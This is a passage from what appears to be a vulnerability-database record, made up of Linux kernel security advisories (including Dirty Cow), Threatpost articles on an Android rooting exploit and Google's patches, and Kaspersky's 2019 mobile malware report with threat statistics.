The system must be\nrebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/033194.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1042.html", "edition": 3, "modified": "2015-06-03T01:55:17", "published": "2015-06-03T01:55:17", "href": "http://lists.centos.org/pipermail/centos-announce/2015-June/033194.html", "id": "CESA-2015:1042", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2098\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. 
(CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-October/034171.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2098.html", "edition": 3, "modified": "2016-10-25T11:17:10", "published": "2016-10-25T11:17:10", "href": "http://lists.centos.org/pipermail/centos-announce/2016-October/034171.html", "id": "CESA-2016:2098", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:36", "bulletinFamily": "info", "cvelist": ["CVE-2015-1805"], "description": "A rooting application has been found in the wild targeting Nexus mobile devices using a local privilege escalation vulnerability patched two years ago in the Linux kernel that remains unpatched in Android.\n\nResearchers at Zimperium, the same company that discovered last summer\u2019s Stagefright flaws affecting Android, privately disclosed to Google last Tuesday they found an application that had been used to root a Nexus 5 device. This news came a little less than a month after researchers at CORE Team reported to Google that [CVE-2015-1805](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1805>), which was addressed in the Linux kernel in 2014, also affected Android devices.\n\nThe discovery of the rooting application\u2014Google said the exploit was not malicious\u2014prompted Google to push out emergency patches to its partners last Wednesday, and updates for Nexus devices. 
Partner patches are subject to carriers and handset manufacturers pushing the fixes to customer devices.\n\nGoogle said in an [advisory](<https://source.android.com/security/advisory/2016-03-18.html>) published last Friday that all Android devices on kernel versions 3.4, 3.10 and 3.14, including all Nexus devices are vulnerable. Android devices using Linux kernel version 3.18 or higher are not vulnerable.\n\n\u201cThis issue is rated as a critical severity issue due to the possibility of a local privilege escalation and arbitrary code execution leading to local permanent device compromise,\u201d Google said.\n\nRooting applications are particularly dangerous, not only because they are spread usually via Trojanized applications, but because they give their respective payloads system-level persistence.\n\nZimperium founder and CTO Zuk Avraham called the vulnerability being exploited by this particular rooting app \u201cquite generic,\u201d and said that it could be chained with other exploits to gain deeper penetration onto a device.\n\n\u201cIt allows for consistent elevation of privilege, so anyone with malicious intentions with code execution already on a device and wants higher code execution, could use it to get access to the microphone or camera, or read email, anything like that,\u201d Avraham said. \u201cBut you do need an initial code execution vulnerability or a presence on the device like an app for example. Then you can use this exploit, which is quite generic, and gain kernel privileges on the device.\u201d\n\nAvraham said this flaw was able to generate a payload on a device with a March 1, 2016 patch level, the most up to date patch level. 
He said the rooting app was spreading on an outside Android market away from Google\u2019s Google Play marketplace.\n\nGoogle said Google Play already blocks rooting applications by default, and that this particular rooting application if downloaded and manually installed from outside Google Play will also be blocked by Google\u2019s Verify Apps tool. Verify Apps, the former Bouncer, scans apps in Google Play for harmful behaviors and warns users not to install them if they\u2019re deemed dangerous.\n\n\u201cVerify Apps has been updated to block the installation of applications that we have learned are attempting to exploit this vulnerability both within and outside of Google Play,\u201d Google said in its advisory.\n\nSince rooting applications are banned from Google Play, an attacker would have to somehow convince a victim to manually install the app.\n\nGoogle said users can check the patch levels of their phone to determine whether they are vulnerable to these attacks; devices with a security patch level of March 18, 2016 or April 2, 2016 are not vulnerable, Google said.\n\nThis news comes days after the disclosure of new [exploits targeting vulnerabilities in libstagefright](<https://threatpost.com/stagefright-variant-metaphor-puts-millions-of-samsung-lg-and-htc-phones-at-risk/116870/>) called Metaphor, which uses malicious video files in two stages, to exploit Nexus 5, LG G3, HTC One and Samsung Galaxy S5 handsets. The first video checks for the presence of the particular Stagefright flaw, and the second exploits the bug if it\u2019s present on the device. 
The attack gives attackers remote control over the Android device.\n", "modified": "2016-03-24T19:16:41", "published": "2016-03-23T07:00:46", "id": "THREATPOST:AF1B767CD9BF9276A4427C90B4CEAA8D", "href": "https://threatpost.com/nexus-android-devices-vulnerable-to-rooting-application-permanent-compromise/116942/", "type": "threatpost", "title": "Android Rooting Application Emergency Patch", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:33", "bulletinFamily": "info", "cvelist": ["CVE-2015-1805"], "description": "Google has patched a vulnerability being [exploited in the wild](<https://threatpost.com/nexus-android-devices-vulnerable-to-rooting-application-permanent-compromise/116942/>) to root Nexus 5 Android devices.\n\nThe public exploit\u2014a [rooting application](<https://source.android.com/security/advisory/2016-03-18.html>)\u2014was privately disclosed to Google on March 15 by Zimperium researchers, and a less than a month after CORE Team researchers reported that [CVE-2015-1805](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1805>), which was patched in 2014 in the Linux kernel, also affects Android devices.\n\nThe patch is part of today\u2019s monthly Android patch release. The [Android Nexus Security Bulletin](<https://source.android.com/security/bulletin/index.html>) patches 15 vulnerabilities rated critical by Google in eight Android components, including Mediaserver and libstagefright.\n\nThe elevation of privilege bug exploited by the rooting application is the lone kernel-level flaw patched this month and it affects Nexus versions 4.4.4, 5.0.2, 5.1.1, 6.0 and 6.0.1. Google warned last month that exploits could lead to permanent device compromise.\n\nRooting applications are particularly dangerous because they give their respective payloads system-level persistence. 
Zimperium founder and CTO Zuk Avraham told Threatpost the vulnerability could be chained with other exploits to gain deeper penetration onto a device.\n\n\u201cIt allows for consistent elevation of privilege, so anyone with malicious intentions with code execution already on a device and wants higher code execution, could use it to get access to the microphone or camera, or read email, anything like that,\u201d Avraham said. \u201cBut you do need an initial code execution vulnerability or a presence on the device like an app for example. Then you can use this exploit, which is quite generic, and gain kernel privileges on the device.\u201d\n\nAs is becoming customary, the monthly Nexus security bulletins include fixes for critical Mediaserver and libstagefright vulnerabilities. Since the [Stagefright flaws](<https://threatpost.com/android-stagefright-flaws-put-950-million-devices-at-risk/113960/>) and exploits disclosed last summer during the Black Hat conference, researchers are taking a close look at this [core and privileged component of Android](<https://threatpost.com/stagefright-variant-metaphor-puts-millions-of-samsung-lg-and-htc-phones-at-risk/116870/>). Attackers can exploit these bugs using malicious media files to gain kernel access.\n\n\u201cIt\u2019s old code that\u2019s been there for a long time and it didn\u2019t go through as intense security testing as other pieces of Android,\u201d Zimperium\u2019s Avraham said. \u201cFor some researchers, it doesn\u2019t take much time to discover Stagefright vulnerabilities. If you have a device that\u2019s a few months old and want to target them with [malicious] MP4 files, it\u2019s relatively easy to find a vulnerability there. Every time you have a Stagefright bug and a kernel bug, an attacker can chain both and it\u2019s game over.\u201d\n\nToday\u2019s bulletin patches seven remote code execution bugs in Mediaserver, and one more in libstagefright. 
The update addresses memory corruption issues in both components.\n\n\u201cStagefright gives an attacker initial code execution,\u201d Avraham said. \u201cYou can send a link and trick the victim into opening it, or get man-in-the-middle and inject an iframe that shows the video, and once loaded\u2014without interaction\u2014the attacker gets initial code execution. To fully hack the device, chain it with a kernel exploit and at that point, you fully control the device.\u201d\n\nAlso patched today, three critical flaws in DHCPCD that open the door to remote code execution in the context of the DHCP client. The DHCP service, Google said, has privileges that third party applications would not.\n\nGoogle also patched a critical flaw in the Media Codec used by Mediaserver, which could be exploited by a crafted file to gain remote code execution.\n\nTwo Qualcomm components, the Qualcomm Performance Module and Qualcomm RF, were patched against elevation of privilege flaws. Both vulnerabilities could be exploited by malicious apps to execute code within the kernel.\n\nThe final critical vulnerability was patched in the common kernel and could also be exploited by a malicious app to gain remote code execution and permanent device compromise.\n\nGoogle also today patched 16 vulnerabilities it rates a \u201chigh\u201d severity, and eight others rated \u201cmoderate.\u201d\n", "modified": "2016-04-04T15:18:56", "published": "2016-04-04T14:00:22", "id": "THREATPOST:D28C91D0999C5EDFA9FCD89F6C95B17D", "href": "https://threatpost.com/google-patches-old-flaw-exploited-by-rooting-application/117161/", "type": "threatpost", "title": "April 2016 Google Android Nexus Security Bulletin", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:28:15", "bulletinFamily": "unix", "cvelist": ["CVE-2018-9568"], "description": "This update provides a new kernel 2.6.32-042stab134.8 for Virtuozzo Containers for 
Linux 4.7 and Server Bare Metal 5.0 based on the RHEL 6.10 kernel 2.6.32-754.6.3.el6. The new kernel introduces a security and stability fix.\n**Vulnerability id:** CVE-2018-9568\nMemory corruption due to incorrect socket cloning.\n\n", "edition": 1, "modified": "2018-12-12T00:00:00", "published": "2018-12-12T00:00:00", "id": "VZA-2018-087", "href": "https://help.virtuozzo.com/s/article/VZA-2018-087", "title": "Important kernel security update: New kernel 2.6.32-042stab134.8 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:50", "bulletinFamily": "unix", "cvelist": ["CVE-2018-9568"], "description": "This update provides a new kernel 2.6.32-042stab134.8 for Virtuozzo 6.0 based on the RHEL 6.10 kernel 2.6.32-754.6.3.el6. The new kernel introduces a security and stability fix.\n**Vulnerability id:** CVE-2018-9568\nMemory corruption due to incorrect socket cloning.\n\n", "edition": 1, "modified": "2018-12-12T00:00:00", "published": "2018-12-12T00:00:00", "id": "VZA-2018-086", "href": "https://help.virtuozzo.com/s/article/VZA-2018-086", "title": "Important kernel security update: New kernel 2.6.32-042stab134.8; Virtuozzo 6.0 Update 12 Hotfix 35 (6.0.12-3729)", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:22", "bulletinFamily": "unix", "cvelist": ["CVE-2018-9568"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with a security fix. The patch applies to all supported Virtuozzo kernels.\n**Vulnerability id:** CVE-2018-9568\nTransforming an IPv6 socket to an IPv4 and then transforming it back to a listening socket could result in a kernel memory corruption. 
An unprivileged user on the host or in a container could exploit this to crash the kernel.\n\n", "edition": 1, "modified": "2018-12-17T00:00:00", "published": "2018-12-17T00:00:00", "id": "VZA-2018-088", "href": "https://help.virtuozzo.com/s/article/VZA-2018-088", "title": "Important kernel security update: Virtuozzo ReadyKernel patch 68.2 for Virtuozzo 7.0.4 HF3 to 7.0.8 HF1", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-10-27T01:27:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n\n", "modified": "2016-10-27T01:06:19", "published": "2016-10-27T01:06:19", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00065.html", "id": "SUSE-SU-2016:2657-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 15 for SLE 12 (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-21T17:27:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to fix one security\n issue.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. 
It is\n reportedly exploited in the wild (bsc#1004418).\n\n", "modified": "2016-10-21T17:17:10", "published": "2016-10-21T17:17:10", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00036.html", "id": "SUSE-SU-2016:2585-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2020-03-24T11:38:55", "bulletinFamily": "blog", "cvelist": ["CVE-2016-5195"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Figures of the year\n\nIn 2019, Kaspersky mobile products and technologies detected:\n\n * 3,503,952 malicious installation packages.\n * 69,777 new mobile banking Trojans.\n * 68,362 new mobile ransomware Trojans.\n\n## Trends of the year\n\nIn summing up 2019, two trends in particular stick out:\n\n * Attacks on users' personal data became more frequent.\n * Detections of Trojans on the most popular application marketplaces became more frequent.\n\nThis report discusses each in more detail below, with examples and statistics.\n\n### Attacks on personal data: stalkerware\n\nOver the past year, the number of attacks on the personal data of mobile device users increased by half: from 40,386 unique users in 2018 to 67,500 in 2019. 
This is not about classic spyware or Trojans, but so-called [stalkerware](<https://encyclopedia.kaspersky.com/glossary/stalkerware-spouseware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).\n\n_Number of unique users attacked by stalkerware in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152357/mobile_report_2019_01-en-stalkerware-users.png>)\n\nStalkerware can be divided into two major categories:\n\n * Trackers.\n * Full-fledged tracking apps.\n\nThe creators of trackers generally focus on two main features: tracking victims' coordinates and intercepting text messages. Until recently, many such apps, mostly free, were available on the official Google Play marketplace. After [Google Play changed its policy](<https://play.google.com/about/privacy-security-deception/malicious-behavior/>) in late 2018, most of them were removed from the store, and most developers pulled support for their products. However, such trackers can still be found on their developers' and third-party sites.\n\nIf such an app gets onto a device, messages and data about the user's location become accessible to third parties. These third parties are not necessarily only those tracking the user: the client-server interaction of some services ignores even the minimum security requirements, allowing anyone to gain access to the accumulated data.\n\nThe situation of full-fledged stalkerware is somewhat different: there are no such apps on Google Play, but they are actively supported by developers. These tend to be commercial solutions with extensive spying capabilities. They can harvest almost any data on a compromised device: photos (both entire archives and individual pictures, for example, taken at a certain location), phone calls, texts, location information, screen taps (keylogging), and so on. 
\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152711/mobile_report_2019_stalk_screen.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the capabilities of the software_\n\nMany apps exploit root privileges to extract messaging history from protected storage in social networking and instant messaging applications. If it cannot gain the required access, the stalkerware can take screenshots, log screen taps and even extract the text of incoming and outgoing messages from the windows of popular services using the Accessibility feature. One example is the commercial spyware app Monitor Minor.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152741/mobile_report_2019_stalk_screen_features.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the software's ability to intercept data from social networks and messengers_\n\nThe developers of the [commercial spyware FinSpy](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) went one step further by adding a feature to intercept correspondence in secure messengers, such as Signal, Threema and others. To ensure interception, the app independently obtains root privileges by exploiting the vulnerability CVE-2016-5195, aka \"Dirty Cow\". The expectation is that the victim is using an old device with an outdated operating system kernel in which the exploit can escalate privileges to root.\n\nIt is worth noting that the user base of messaging apps includes hundreds of millions. Classic calls and texts are being used less and less, and communication \u2014 be it text messages or voice/video calls \u2014 is gradually moving to instant messaging applications. 
Hence the rising interest in data stored in such apps.\n\n### Attacks on personal data: advertising apps\n\nIn 2019, we observed a significant increase in the number of [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) threats, one purpose being to harvest personal data on mobile devices.\n\nThe statistics show that the number of users attacked by adware in 2019 is roughly unchanged from 2018. \n\n_Number of users attacked by adware in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152401/mobile_report_2019_02-en-adware-users.png>)\n\nAt the same time, the number of detected adware installation packages almost doubled from 2018.\n\n_Number of detected adware installation packages in 2018 and 2019._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152406/mobile_report_2019_03-adware-pkg.png>)\n\nThese indicators typically correlate, but not in the case of adware. This can be explained by several factors:\n\n * Adware installation packages are generated automatically and spread literally everywhere, but for some reason do not reach the target audience. It is possible that they get detected immediately after being generated and cannot propagate further. \n * Often, such apps contain nothing useful \u2014 just an adware module; so the victim immediately deletes them, assuming that they allow removing themselves.\n\nNevertheless, it is the second successive year that adware has appeared in our Top 3 detected threats. KSN statistics confirm it to be one of the most common types of threats: four places in our Top 10 mobile threats by number of users attacked in 2019 are reserved for adware-class apps, with one member of the family, HiddenAd, taking the third. 
\n\n| \u0412\u0435\u0440\u0434\u0438\u043a\u0442 | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 35,83 \n2 | Trojan.AndroidOS.Boogr.gsh | 8,30 \n3 | AdWare.AndroidOS.HiddenAd.et | 4,60 \n4 | AdWare.AndroidOS.Agent.f | 4,05 \n5 | Trojan.AndroidOS.Hiddapp.ch | 3,89 \n6 | DangerousObject.AndroidOS.GenericML | 3,85 \n7 | AdWare.AndroidOS.HiddenAd.fc | 3,73 \n8 | Trojan.AndroidOS.Hiddapp.cr | 2,49 \n9 | AdWare.AndroidOS.MobiDash.ap | 2,42 \n10 | Trojan-Dropper.AndroidOS.Necro.n | 1,84 \n \n_*Share of all users attacked by this type of malware in the total number of users attacked._\n\nIn 2019, mobile adware developers not only generated tens of thousands of packages, but also technically enhanced their products, in particular through the addition of techniques to bypass operating system restrictions. \n\nFor example, Android imposes certain restrictions on background operation of applications for battery-saving reasons. This negatively impacts the operation of various threats, including adware apps that like to lurk in the background and wait for, say, a new banner to arrive from C&C. The introduction of such restrictions made it impossible for apps to show ads outside the context of their own window, thus starving most adware of oxygen.\n\nThe creators of the KeepMusic adware family found a smart workaround. To bypass the restrictions, their software does not request permissions like, for example, malware does. Instead, the program starts looping an MP3 file that plays silence. The operating system decides that the music player is running, and does not terminate the KeepMusic background process. As a result, the adware can request a banner from the server and display it any time. \n\n### Attacks on personal data: exploiting access to Accessibility\n\nThe year 2019 saw the appearance of the first specimen of mobile financial malware (Trojan-Banker.AndroidOS.Gustuff.a), featuring enhanced autonomy. 
Until then, two methods had been used to steal money from bank accounts: \n\n * **Via SMS banking on the victim end.** This is an autonomous theft technique that requires only information about the transfer recipient. This data the bot can either store in its body or receive as a command from C&C. The Trojan infects the device and sends a text with a transfer request to a special bank phone number. The bank then automatically transfers the funds to the recipient from the device owner's account. Due to the increase in such theft, limits on mobile transfers have been tightened, so this attack vector has been relegated to backup.\n * **By stealing online banking credentials.** This has been the dominant method in recent years. Cybercriminals display a phishing window on the victim's device that mimics the bank's login page and reels in the victim's credentials. In this case, the cybercriminals need to carry out the transaction themselves, using the app on their own mobile device or a browser. It is possible that the bank's anti-fraud systems can detect the abnormal activity and block it, leaving the attackers empty-handed even if the victim's device is infected. \n\nIn 2019, cybercriminals mastered a third method: stealing by manipulating banking apps. First, the victim is persuaded to run the app and sign in, for example, using a fake push notification supposedly from the bank. Tapping the notification does indeed open the banking app, which the attackers, using Accessibility, gain full control over, enabling them to fill out forms, tap buttons, etc. Moreover, the bot operator does not need to do anything, because the malware performs all actions required. Such transactions are trusted by banks, and the maximum transfer amount can exceed the limits of SMS banking by an order of magnitude. As a result, the cybercriminals can clean out the account in one go. \n\nStealing funds from bank accounts is just one malicious use of Accessibility. 
In effect, any malware with these permissions can control all on-screen processes, while any Android app is basically a visual representation of buttons, data entry forms, information display, and so on. Even if developers implement their own control elements, such as a slider that needs to be moved at a certain speed, this too can be done using Accessibility commands. Thus, cybercriminals have tremendous leeway to create what are perhaps the most dangerous classes of mobile malware: spyware, banking Trojans and ransomware Trojans.\n\nThe misuse of the Accessibility features poses a serious threat to users' personal data. Where previously cybercriminals had to [overlay](<https://encyclopedia.kaspersky.com/glossary/overlaying-overlay-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) phishing windows and request a bunch of permissions in order to steal personal information, now victims themselves output all necessary data to the screen or enter it in forms, where it can be easily gleaned. And if the malware needs more, it can open the Settings section by itself, tap a few buttons, and obtain the necessary permissions. \n\n### Mobile Trojans on popular marketplaces: Google Play\n\nSlipping malware into the main Android app store delivers much better results than social engineering victims into installing apps from third-party sources. In addition, this approach enables attackers to:\n\n * Bypass SafetyNet, Android's built-in antivirus protection. If a user downloads an app from Google Play, the likelihood that it will be installed without additional requests \u2014 for example, to disable the built-in protection under an imaginary pretext \u2014 is very high. The only thing that can protect the user from infection in that situation is a third-party security solution.\n * Overcome psychological barriers. 
Official app stores enjoy far greater trust than third-party \"markets,\" and act as store windows of sorts that can be used for distributing software much more efficiently.\n * Target victims without unnecessary spending. Google Play can be used to host fakes that visually mimic, say, popular banking apps. This was the distribution vector used in a spate of attacks on mobile users in Brazil: we detected [numerous malicious programs](<https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/>) on Google Play under the guise of mobile apps for Brazilian banks.\n\nIn addition to malicious doppelgangers, cybercriminals deployed several other tricks to maximize device infection rates: \n\n * The [case of CamScanner](<https://securelist.com/dropper-in-google-play/92496/>) showed that an app's legitimate behavior can be supplemented with malicious functions by updating its code for handling advertising. This could be described as the most sophisticated attack vector, since its success depends on a large number of factors, including the user base of the host app, the developer's trust in third-party advertising code and the type of malicious activity. \n * [Another example](<https://securelist.com/mobile-subscriptions/91211/>) demonstrates that attackers sometimes upload to Google Play fairly well-behaved apps from popular user categories. In this case, it was photo editors. \n * The most depressing case involves a Trojan from the Joker family, of which we have found many samples on Google Play, and still are. Deploying the tactic of mass posting, cybercriminals uploaded apps under all kinds of guises: from wallpaper-changing tools and security solutions to popular games. In some cases, the Trojan scored hundreds of thousands of downloads. 
No other attack vector can reach this kind of audience within such a short space of time.\n\nThe good news is that Google and the antivirus industry have [teamed up](<https://security.googleblog.com/2019/11/the-app-defense-alliance-bringing.html>) to fight threats on the site. This approach should prevent most malware from penetrating the official Google app store.\n\n## Statistics\n\nIn 2019, we discovered 3,503,952 mobile malicious installation packages, which is 1,817,190 less than in the previous year. We have not detected so few mobile threats since 2015.\n\n_Number of mobile malicious installation packages for Android in 2015\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152410/mobile_report_2019_04-total-apk.png>)\n\nFor three consecutive years, we have seen an overall decline in the number of mobile threats distributed as installation packages. The picture largely depends on specific cybercriminal campaigns: some have become less active, others have completely ceased, and new players have yet to gain momentum. 
The situation is similar with the number of attacks using mobile threats: whereas in 2018 we observed a total of **116.5 million** attacks, in 2019 the figure was down to **80 million**.

_Number of attacks defeated by Kaspersky mobile solutions in 2018–2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152415/mobile_report_2019_05-en-total-attacks.png>)

The figures returned to the level of the year before, prior to the start of the Asacub banking Trojan epidemic.

Since the number of attacks correlates with the number of users attacked, we observed a similar picture for this indicator.

_Number of users attacked by mobile malware in 2018–2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152419/mobile_report_2019_06-en-total-attack-users.png>)

_Geography of attacked users in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152424/mobile_report_2019_07-en-geo-attack-users.png>)

**Top 10 countries by share of users attacked by mobile malware:**

Country* | %**
---|---
Iran | 60.64
Pakistan | 44.43
Bangladesh | 43.17
Algeria | 40.20
India | 37.98
Indonesia | 35.12
Nigeria | 33.16
Tanzania | 28.51
Saudi Arabia | 27.94
Malaysia | 27.36

_*Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile security solutions in the reporting period._
_**Unique users attacked in the country as a percentage of all users of Kaspersky mobile security solutions in the country._

In 2019, Iran (60.64%) topped the list for the third year in a row. The most common threats in that country come from adware and potentially unwanted software: Trojan.AndroidOS.Hiddapp.bn, AdWare.AndroidOS.Agent.fa, and RiskTool.AndroidOS.Dnotua.yfe.

Pakistan (44.43%) climbed from seventh to second place, mainly on the back of a rise in the number of users attacked by adware.
The largest contribution was made by members of the AdWare.AndroidOS.HiddenAd family. A similar picture can be seen in Bangladesh (43.17%), whose share has grown due to the same adware families.

### Types of mobile threats

_Distribution of new mobile threats by type in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152430/mobile_report_2019_08-en-threat-types.png>)

In 2019, the share of RiskTool-class threats decreased by 20 p.p. (to 32.46%). We believe the main reason to be the sharp drop in the generation of threats from the SMSreg family. A characteristic feature of this family is payment via SMS, for example money transfers or subscriptions to mobile services, where the user is not explicitly informed that a payment is being made or that money is being charged to their mobile account. Whereas in 2018 we picked up 1,970,742 SMSreg installation packages, the number decreased by an order of magnitude to 193,043 in 2019. At the same time, far from declining, the number of packages from other families in this class of threats increased noticeably.

# | Name of family | %*
---|---|---
1 | Agent | 27.48
2 | SMSreg | 16.89
3 | Dnotua | 13.83
4 | Wapron | 13.73
5 | SmsSend | 9.15
6 | Resharer | 4.62
7 | SmsPay | 3.55
8 | PornVideo | 2.51
9 | Robtes | 1.23
10 | Yoga | 1.03

_*Share of packages of this family in the total number of riskware-class packages detected in 2019._

Skymobi and Paccy dropped out of the Top 10 families of potentially unwanted software; the number of installation packages of these families detected in 2019 decreased tenfold. Their creators likely minimized or even ceased their development and distribution. However, a new player appeared: the Resharer family (4.62%), which ranked sixth.
This family is noted for its self-propagation: it posts information about itself on various sites and mails it to the victim's contacts.

Adware demonstrated the most impressive growth, up by 14 p.p. The main source of this growth was HiddenAd (26.81%); the number of installation packages of this family increased by two orders of magnitude against 2018.

# | Name of family | %*
---|---|---
1 | HiddenAd | 26.81
2 | MobiDash | 20.45
3 | Ewind | 16.34
4 | Agent | 15.27
5 | Dnotua | 5.51
6 | Kuguo | 1.36
7 | Dowgin | 1.28
8 | Triada | 1.20
9 | Feiad | 1.01
10 | Frupi | 0.94

_*Share of packages of this family in the total number of adware-class packages detected in 2019._

Significant growth also came from the MobiDash (20.45%) and Ewind (16.34%) families. Meanwhile, the Agent family (15.27%), which held a leading position in 2018, dropped to fourth place.

Compared to 2018, the number of mobile Trojans detected decreased sharply. A downward trend has been observed for two consecutive years now, yet droppers remain one of the most numerous malware classes. The [Hqwar family](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) showed the most notable decrease: down from 141,000 packages in 2018 to 22,000 in 2019. At the same time, 2019 saw the debut of the Ingopack family: we detected 115,654 samples of this dropper.

Meanwhile, the share of Trojan-class threats rose by 6 p.p., with the two most numerous malware families of this class being Boogr and Hiddapp. The Boogr family contains various Trojans that have been detected using machine-learning (ML) technology. A feature of the Hiddapp family is that it hides its icon in the list of installed apps while continuing to run in the background.

The share of mobile ransomware Trojans slightly increased. The Top 3 families of this class of threats remained the same as in 2018: Svpeng, Congur, and Fusob — in that order.
### Top 20 mobile malware programs

The following malware rankings omit potentially unwanted software, such as RiskTool and AdWare.

# | Verdict | %*
---|---|---
1 | DangerousObject.Multi.Generic | 49.15
2 | Trojan.AndroidOS.Boogr.gsh | 10.95
3 | Trojan.AndroidOS.Hiddapp.ch | 5.19
4 | DangerousObject.AndroidOS.GenericML | 5.08
5 | Trojan-Dropper.AndroidOS.Necro.n | 3.45
6 | Trojan.AndroidOS.Hiddapp.cr | 3.28
7 | Trojan-Banker.AndroidOS.Asacub.snt | 2.35
8 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.10
9 | Trojan-Dropper.AndroidOS.Lezok.p | 1.76
10 | Trojan-Banker.AndroidOS.Asacub.a | 1.66
11 | Trojan-Downloader.AndroidOS.Helper.a | 1.65
12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.60
13 | Trojan-Downloader.AndroidOS.Necro.b | 1.59
14 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50
15 | Exploit.AndroidOS.Lotoor.be | 1.46
16 | Trojan.AndroidOS.Hiddapp.cf | 1.35
17 | Trojan.AndroidOS.Dvmap.a | 1.33
18 | Trojan-Banker.AndroidOS.Agent.ep | 1.31
19 | Trojan.AndroidOS.Agent.rt | 1.28
20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.14

_*Share of users attacked by this type of malware out of all attacked users_

As we wrap up the year 2019, first place in our Top 20 mobile malware, as in previous years, goes to the verdict DangerousObject.Multi.Generic (49.15%), which we use for malware detected with cloud technology. The verdict is applied where the antivirus databases still have no signatures or heuristics for malware detection. This way, the most recent malware is uncovered.

